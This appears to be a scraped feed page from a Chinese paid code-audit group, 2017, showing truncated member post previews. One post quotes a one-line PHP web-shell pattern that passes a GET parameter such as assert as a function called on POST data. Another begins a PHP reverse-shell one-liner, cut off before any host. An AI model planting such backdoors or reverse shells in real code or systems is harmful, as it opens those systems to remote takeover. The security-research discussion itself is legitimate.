x

扫码登录

登录二维码

你尚未登录

未加入『代码审计』知识星球的用户只能查看少量内容,且不能下载附件。 加入『代码审计』知识星球即可查看所有内容。

phith0n

2017 二月 06
@下辈子想做头猪: 请问joomla的phpmailer远程命令执行您有重现过吗?Security Announcements

phith0n

2017 二月 05
@wonderkun: phithon师父,我有个东西不明白:
$_GET[a]($_POST[b])
当传入a=assert 就是后门
当a=eval就是报错说eval不是函数。
难道eval真不是函数,是一个语句,像echo一样?

...

roker

2017 二月 05

大佬们,这种情况
$a = &#x...

kericwy

2017 一月 31

请教大家一个小问题,用php来进行反弹shell的时候,使用php -r '$sock=...

图片


phith0n

2017 一月 28

phith0n

2017 一月 27

废话不...

图片


re4lity

2017 一月 26

BurpSuite Pro v1.7....

phith0n

2017 一月 24

小密圈可...

phith0n

2017 一月 23

<?php
if(strlen($_GET[1]) < ...

Melody

2017 一月 21

附件


# 附件名 大小 时间 操作
蝉知cms审计小记.pdf 251.8 KB 01/21/2017